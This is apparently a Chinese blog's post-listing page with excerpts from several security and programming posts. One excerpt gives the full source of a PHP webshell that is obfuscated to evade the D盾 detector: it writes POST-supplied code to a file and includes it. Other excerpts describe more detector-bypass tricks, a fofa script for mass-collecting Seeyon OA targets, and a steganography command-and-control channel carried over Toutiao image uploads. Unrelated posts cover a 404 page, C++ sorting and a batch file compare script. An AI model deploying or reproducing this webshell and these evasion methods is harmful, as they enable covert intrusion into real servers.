算法
shadow wolf
oagi.ml
展开
-
PHP小马免杀的浅谈[过最新D盾]
PHP小马免杀的浅谈[过最新D盾] 绕过主要思路:使用写文件的函数写出另一个php文件然后include/require 回来执行方法1:File_put_content方法2 使用fwrite绕过主要思路:使用写文件的函数写出另一个php文件然后include/require 回来执行方法1:File_put_contentD盾还是报了,但如果是PHP7.0以上的,还是有绕过方法滴:<?php/*T00ls.net shadowwolf2021-7-25*/( ~urldec原创 2021-07-25 13:49:09 · 823 阅读 · 2 评论 -
fofa批量获取致远oa【py脚本】
首先获取fofa中cookie中的_fofapro_ars_session=然后填入下面的xxxxx中然后运行即可import requests,reimport timesession = "_fofapro_ars_session=xxxxx"header = { "Accept":"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.0原创 2021-01-24 12:06:22 · 2765 阅读 · 6 评论 -
一款过d盾PHP小马
<?php$_='%99%88%8D%96%8B%9A';$pass='a';$rand_=rand();$a=$_POST[$pass];$file=md5('shadowwolf');$shell='<?php '.$a.' ?>';$myfile = fopen($file, "w");(~urldecode($_))($myfile, $shell);include $file;可以自己测测看啊原创 2020-12-14 22:23:31 · 354 阅读 · 2 评论 -
如何利用今日头条的图片功能做命令执行
最近有点无聊,逛今日头条发现有图片上传功能,想利用一波,拿来做远控命令执行的跳板大概思路是,得到了头条的图片上传接口,上传图片,该图片是用steghide隐写进去的,主要是测了一下,今日头条的图片不会被压缩(360识图这些地方都有轻度的图片压缩,在下载到本地的时候不能steghide解密),然后就可以利用:利用过程大概是下面这样:控制端发送指令->指令隐写到图片中(发给被控端只有一个url)->被控端检测到url后下载到本地(然后用文件夹里的steghide把图片里面的命令拿出,然后执行)-原创 2020-11-14 19:58:18 · 541 阅读 · 0 评论 -
分享一个简单唯美的404页
<?phpheader("HTTP/1.1 404 Not Found");header("Status: 404 Not Found");function random_poem(){ $poems="人生的价值,并不是用时间,而是用深度去衡量的。-- 列夫·托尔斯泰 三人行,必有我师焉。择其善者而从之,其不善者而改之。——孔子 人生不是一种享乐,而是一桩十分沉重的工作。-- 列夫·托尔斯泰 成为卓越的代名词,很多人并不需要杰出素质的环境。——Steve Jobs 活着就是为了改变世原创 2020-07-19 16:24:24 · 1811 阅读 · 2 评论 -
[c++] 关于排序的一些注意事项
函数名功能描述sort对给定区间所有元素进行排序stable_sort对给定区间所有元素进行稳定排序partial_sort对给定区间所有元素部分排序partial_sort_copy对给定区间复制并排序nth_element找出给定区间的某个位置对应的元素is_sorted判断一个区间是否已经排好序partition使得符合某个条件的元素放在前面stable_partition相对稳定的使得符合某个条件的元素放在前面要使用此函数只需用#include sort即可使用原创 2020-05-16 15:18:28 · 286 阅读 · 1 评论 -
[Bat]用BAT实现快速对比文件内容
最近想要比较两个文件的数据但是因为文件都很大,没法手动查阅进行对比所以我用windows的fc命令来简化对比过程代码如下:@echo off:loopmake_datanumbernumber0fc 作比较的文件1.txt 作比较的文件2.txtif errorlevel==1 pausegoto loop把以上代码复制进txt后改bat即可...原创 2020-05-16 15:14:43 · 3181 阅读 · 0 评论 -
[PHP]用php的curl_post写一个爬取百度搜索结果的api
0x01 起因 因为手速慢,漏洞刷不过别人,一个个手补确实慢,所以想自己写一个api,一键抓取zoomeye的20页,然后就可以打批量了 ovo(真是太妙了!)0x01 动工 1.抓包做准备要做一个抓取的,当然是先抓包啦~拿出我的bp,和zoomeye篇一样先输入一个关键字,方便在bp里面找我输入的关键字然后回车~发现我输入的关键字在这个GET的请求包里面用repeat模块后:发现返回了我要的搜索结果 &nbs原创 2020-05-16 14:17:43 · 1824 阅读 · 0 评论